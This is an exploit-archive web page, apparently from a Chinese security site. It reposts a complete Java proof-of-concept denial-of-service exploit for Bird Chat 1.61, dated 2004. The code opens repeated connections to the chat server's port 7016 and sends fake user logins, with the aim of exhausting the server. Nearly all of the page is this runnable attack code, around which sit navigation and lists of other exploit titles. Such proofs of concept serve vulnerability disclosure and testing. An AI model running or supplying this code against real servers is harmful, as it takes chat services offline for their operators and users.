首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Bird Chat 1.61 Denial Of Service Exploit
来源:www.autistici.org 作者:Donato 发布时间:2004-08-24  

Bird Chat 1.61 Denial Of Service Exploit


/*
Bird Chat 1.61 - Denial Of Service - Proof Of Concept
Coded by: Donato Ferrante
*/

import java.net.Socket;
import java.net.InetAddress;
import java.net.ConnectException;
import java.net.SocketTimeoutException;
import java.io.OutputStream;
import java.io.InputStream;

public class BirdChat161_DoS_poc {

private final static int MAX_CONNECTION = 16;
private final static int PORT = 7016;
private final static String VERSION = "0.1.0";

public static void main(String [] args){

System.out.println(
"\n\nBird Chat 1.61 - Denial Of Service - Proof Of Concept\n" +
"Version: " + VERSION + "\n\n" +
"coded by: Donato Ferrante\n" +
"e-mail: fdonato@autistici.org\n" +
"web: www.autistici.org/fdonato\;n\n"
);


String host = "localhost";

try{

if(args.length != 1)
usage();

host = args[0];

}catch(Exception e){usage();}

try{


int i = 1,
var = 0;


while(i++ <= MAX_CONNECTION){

try{

String err = "";
int port = PORT;
InetAddress addr = InetAddress.getByName(host);
Socket socket = new Socket(addr, port);
socket.setSoTimeout(3000);

InputStream stream = socket.getInputStream();

int line = stream.read();
while(line != -1){

if(line == '?'){
break;
}

line = stream.read();

}


OutputStream outStream = socket.getOutputStream();
outStream.write(("*user=fake_user0" + ++var + "\n").getBytes());


int count = 0;
line = stream.read();
while(true){

line = stream.read();

if(line == '\n')
count++;

if(count >= 3)
break;
}


}catch(SocketTimeoutException ste){break;}
catch(ConnectException ce){System.err.println(ce); continue;}
}


}catch(Exception e){System.err.println(e);}

System.out.println("\nBird Chat - Denial Of Service - Proof_Of_Concept terminated.\n\n");
}

private static void usage(){

System.out.println("Usage: java BirdChat161_DoS_poc <host>\n\n");
System.exit(-1);
}


}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MusicDaemon<=0.0.3/etc/shad
·Remote Exploit for Hafiye-1.0
·PADS Simple Stack Overflow Exp
·Axis Network Camera/Video Serv
·BadBlue v2.52 Web Server Denia
·Squirrelmail chpasswd local Ro
·Qt 3.x bmp image parsing local
·Winamp<=5.04Skin File Remot
·XV v3.x bmp parsing local buff
·Gaucho Email Client Buffer Ove
·Gallery1.4.4save_photos.php PH
·Painkiller <= 1.31 code exe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved